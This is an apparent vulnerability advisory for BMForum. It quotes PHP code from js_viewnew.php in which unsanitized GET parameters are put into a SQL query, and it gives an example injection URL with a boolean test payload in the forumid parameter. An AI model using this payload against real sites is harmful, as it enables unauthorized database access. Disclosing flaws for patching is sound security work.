# Author: Stephan Sattler # Software Website: http://www.bmforum.com/ # Software Link: http://www.bmforum.com/down/ # Required: magic quotes = Off [ Vulnerability ] /add-on/js_viewnew.php line 20++: $length = $_GET['length']; $forumid = $_GET['forumid']; $num = $_GET['num']; $forumnum=$forumid; {....} $query = "SELECT * FROM {$database_up}threads WHERE forumid='$forumid' ORDER BY 'changetime' DESC LIMIT 0,$num"; #Explanation: $forumid($_GET['forumid']) isn't sanitized at all, an attacker could use this for an SQL-Injection. #Example for an injection: http://[site]/[folder]/js_viewnew.php?forumid=2'+AnD+1='1&num=1&length=1